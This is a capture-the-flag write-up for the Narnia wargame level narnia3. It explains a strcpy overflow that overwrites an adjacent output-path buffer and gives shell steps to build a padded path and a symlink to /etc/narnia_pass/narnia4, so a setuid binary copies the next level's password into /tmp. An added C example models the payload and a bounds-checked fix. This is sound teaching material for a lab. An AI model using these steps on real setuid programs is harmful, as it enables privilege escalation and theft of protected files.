Narnia3 - narnia4

From JaxHax


narnia3@melinda:/narnia$ cat narnia3.c 
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];

        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }

        /* open files */
        strcpy(ifile, argv[1]);                 /* unbounded copy into ifile[32] */
        if((ofd = open(ofile,O_RDWR)) < 0 ){    /* no O_CREAT: ofile must already exist */
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }

        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

        /* close 'em */
        close(ifd);
        close(ofd);

        exit(1);
}


Okay, this one seems interesting. By design it reads data from a user-specified file and writes it to the path in ofile, which is hardcoded to "/dev/null". The two relevant variables are:

char ofile[16] = "/dev/null";
char ifile[32];

The value for ifile is copied from argv[1] with strcpy(), with no length check. That is a buffer overflow, but it does not give us EIP control: every path out of main() ends in exit(), so the saved return address is never used. What we can do is overwrite ofile, which sits right after ifile. They are declared together, so in memory the layout should look like this:

|              | lower addresses  <=== ifile starts here (byte 0 of argv[1])
|  ifile[32]   |
|              | string data flows downward, toward higher addresses
|              |
|              |  <=== ofile starts here (byte 32 of argv[1])
|  ofile[16]   |
|______________| higher addresses

So we can pass one long string, but that single string has to satisfy both file names at once: all of argv[1] is ifile and must be a readable path, and whatever starts at byte 32 is ofile and must be a writable path. We need ofile to land somewhere in /tmp that we control, while ifile resolves to /etc/narnia_pass/narnia4. The way to do that is a symlink under a directory in /tmp whose name pads the string out to exactly 32 bytes, followed by the ofile path, so that the same string is both the input path (via the symlink) and, from offset 32 on, the output path.
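To make the overlap concrete, here is an added example written for this page; it is not code from the original write-up or from the narnia3 source. It models the two buffers as one flat 48-byte frame in the order the diagram assumes (this layout is an assumption, since real stack placement is up to the compiler, which is why the write-up verifies it by running the binary), replays what strcpy(ifile, argv[1]) does to ofile, builds the 32+16 byte argument used in the steps that follow, and shows the bounds check that would have prevented the overflow. The "/tmp/" prefix, the 'T' filler and the "/tmp/allmine/hi" target are the write-up's own choices; the sizes come from narnia3.c.

```c
/* Added example: model of the narnia3 ifile/ofile overlap. Not part of the
 * original write-up or of narnia3.c. The frame layout (ifile immediately
 * below ofile) is an assumption that matches the diagram above. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IFILE_SZ 32            /* char ifile[32] in narnia3.c */
#define OFILE_SZ 16            /* char ofile[16] in narnia3.c */

/* The two adjacent buffers: ifile at the lower address, ofile right above. */
struct frame {
    char ifile[IFILE_SZ];
    char ofile[OFILE_SZ];
};

/* Replay the vulnerable copy: an unbounded strcpy into ifile, so bytes from
 * index 32 of arg spill into ofile. Returns 0 on success, -1 if the copy
 * would run past ofile as well (in the real binary that would clobber
 * whatever follows ofile on the stack). */
int vulnerable_copy(struct frame *f, const char *arg)
{
    size_t n = strlen(arg) + 1;                 /* strcpy copies the NUL too */
    if (n > sizeof(*f))
        return -1;
    memset(f, 0, sizeof(*f));
    strcpy(f->ofile, "/dev/null");              /* ofile's initialiser */
    memcpy((char *)f, arg, n);                  /* what strcpy(ifile, arg) does */
    return 0;
}

/* Hardened copy: reject anything that does not fit in ifile together with
 * its terminator, so ofile can never be touched. */
int safe_copy(struct frame *f, const char *arg)
{
    if (strlen(arg) >= IFILE_SZ)
        return -1;
    memset(f, 0, sizeof(*f));
    strcpy(f->ofile, "/dev/null");
    memcpy(f->ifile, arg, strlen(arg) + 1);
    return 0;
}

/* Build the argument used in this write-up: "/tmp/" padded with filler to
 * exactly IFILE_SZ bytes, then the path that must land in ofile. Returns 0
 * on success, -1 if ofile_path plus its NUL does not fit in OFILE_SZ bytes
 * (it would overflow past ofile) or if out is too small. */
int build_payload(char *out, size_t outsz, const char *ofile_path, char filler)
{
    const char *prefix = "/tmp/";
    size_t plen = strlen(prefix);
    size_t olen = strlen(ofile_path);
    if (olen + 1 > OFILE_SZ || outsz < IFILE_SZ + OFILE_SZ)
        return -1;
    memcpy(out, prefix, plen);
    memset(out + plen, filler, IFILE_SZ - plen);   /* 32 - 5 = 27 filler bytes */
    memcpy(out + IFILE_SZ, ofile_path, olen + 1);
    return 0;
}

int main(void)
{
    char arg[IFILE_SZ + OFILE_SZ];
    struct frame f;

    if (build_payload(arg, sizeof(arg), "/tmp/allmine/hi", 'T') != 0)
        return 1;
    printf("argv[1] (%zu bytes): %s\n", strlen(arg), arg);

    if (vulnerable_copy(&f, arg) != 0)
        return 1;
    /* ifile no longer has a terminator of its own: it runs straight into
     * ofile, which is why narnia3 prints the whole argument as ifile and
     * only the tail as ofile. */
    printf("ifile  : %.*s\n", IFILE_SZ, f.ifile);
    printf("ofile  : %s\n", f.ofile);

    printf("safe_copy on the same argument returns %d\n", safe_copy(&f, arg));
    return 0;
}
```

build_payload refuses an ofile path of 16 or more characters for the same reason the write-up keeps it under 16 bytes: the terminating NUL has to land on the last byte of ofile, or the copy keeps going into whatever follows it.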

First let's make a world-writable directory in /tmp for ofile to point into.

narnia3@melinda:/narnia$ cd /tmp/

narnia3@melinda:/tmp$ mkdir allmine

narnia3@melinda:/tmp$ chmod 777 allmine

narnia3@melinda:/tmp$ cd allmine

Next we need the first part of the overflow string: the 32 bytes that fill ifile completely, leaving no room for a terminator. This part has to be a valid directory name under /tmp, since the real input path will live beneath it:

narnia3@melinda:/tmp/allmine$ perl -e 'print "/tmp/"; print "T"x27; print "\n"' # "/tmp/" is 5 long. 32 - 5 = 27. 

Now make that a directory and make it globally accessible.

narnia3@melinda:/tmp/allmine$ mkdir /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT

narnia3@melinda:/tmp/allmine$ chmod 777 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT

Now, underneath that directory, we need to recreate the path that will overwrite ofile, so that the full string is also a valid path on disk.

narnia3@melinda:/tmp/allmine$ mkdir /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp 

narnia3@melinda:/tmp/allmine$ mkdir /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/

Now we symlink the file we actually want to read into that tree. The ofile part of the string, "/tmp/allmine/hi", is 15 characters plus the terminating NUL, which is exactly the 16 bytes of ofile; anything longer would overflow past ofile into whatever follows it on the stack.

narnia3@melinda:/tmp/allmine$ ln -s /etc/narnia_pass/narnia4 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi

narnia3@melinda:/tmp/allmine$ /narnia/narnia3 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi
error opening /tmp/allmine/hi

Error... but note which path is in the message: it is the one we planted, so the overflow into ofile already worked. The open() that failed is the one for ofile, which uses O_RDWR without O_CREAT, so the output file has to exist before narnia3 runs. Let's make sure the chmod took and, to be safe, touch the file so it exists. (The setuid binary opens it for writing as the narnia4 user, so if the open still fails after this, chmod 666 the file as well.)

narnia3@melinda:/tmp/allmine$ cd ..

narnia3@melinda:/tmp$ chmod 777 allmine

narnia3@melinda:/tmp$ cd allmine

narnia3@melinda:/tmp/allmine$ ls

narnia3@melinda:/tmp/allmine$ touch hi

Now let's try this again...

narnia3@melinda:/tmp/allmine$ /narnia/narnia3 /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi
copied contents of /tmp/TTTTTTTTTTTTTTTTTTTTTTTTTTT/tmp/allmine/hi to a safer place... (/tmp/allmine/hi)

That run went through, and the path printed in parentheses is our /tmp/allmine/hi rather than /dev/null, which confirms ofile was overwritten. Only sizeof(buf)-1 = 31 bytes are copied, which is enough for the password file. Let's see what we got.

narnia3@melinda:/tmp/allmine$ ls

narnia3@melinda:/tmp/allmine$ cat hi